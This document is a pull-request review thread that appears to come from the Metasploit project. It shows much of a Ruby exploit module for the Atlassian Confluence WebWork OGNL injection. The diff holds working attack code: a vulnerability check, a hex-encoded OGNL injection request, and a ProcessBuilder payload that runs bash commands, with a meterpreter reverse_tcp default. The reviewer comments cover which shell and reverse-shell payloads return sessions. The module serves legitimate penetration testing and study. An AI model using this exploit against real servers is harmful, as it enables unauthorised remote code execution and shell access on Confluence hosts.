modules/exploits/linux/http/atlassian_confluence_webwork_ognl_injection.rb

```diff
@@ -0,0 +1,155 @@
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8090
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [
+            # /var/atlassian/application-data/confluence/analytics-logs/*.atlassian-analytics.log
+            # /var/atlassian/application-data/confluence/logs/atlassian-confluence.log
+            IOC_IN_LOGS,
+            ARTIFACTS_ON_DISK # CmdStager
+          ]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    token1 = rand_text_alphanumeric(8..16)
+    token2 = rand_text_alphanumeric(8..16)
+    token3 = rand_text_alphanumeric(8..16)
+
+    res = inject_ognl("#{token1}'+'#{token2}'+'#{token3}")
+
+    return CheckCode::Unknown unless res
+
+    unless res.code == 200 && res.body.include?("#{token1}#{token2}#{token3}")
+      return CheckCode::Safe('Failed to test OGNL injection.')
+    end
+
+    CheckCode::Vulnerable('Successfully tested OGNL injection.')
+  end
+
+  def exploit
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    res = inject_ognl(ognl_payload(cmd))
+
+    unless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/)
+      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
+    end
+
+    vprint_good("Successfully executed command: #{cmd}")
+  end
+
+  def inject_ognl(ognl)
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'),
+      'vars_post' => {
+        # https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html
+        # https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341
+        'queryString' => Rex::Text.to_hex(ognl, '\\u00')
+      }
+    )
+  end
+
+  def ognl_payload(cmd)
+    # https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution
+    # https://www.tutorialspoint.com/java/lang/class_forname_loader.htm
+    # https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html
+    # https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html
+    <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
+      '+Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval('
+        new java.lang.ProcessBuilder(
+          "/bin/bash",
```

Comment:
Would `/bin/sh` work here too? 👀

Reply:
It seems `/bin/sh` works here. Though not with the payload type: `cmd/unix/reverse_bash` 

I wasn't able to get a session back when using `cmd/unix/reverse`

Though I was able to write to the tmp folder when using `cmd/unix/generic` with  CMD => `touch /tmp/derp1`

Any suggestions on how to return as session while using `/bin/sh` in the ognl payload?

Reply:
Going to leave as is in order to ensure we make the release cut

Reply:
[Yes.](https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis) I made a judgment call to use `/bin/bash` here, but I think I might revert it. I just need a good default payload.

Reply:
@jheysel-r7: Correct, `cmd/unix/reverse_bash` is dumb and works only in `bash`.

Reply:
https://github.com/rapid7/metasploit-framework/pull/10031#issuecomment-389286752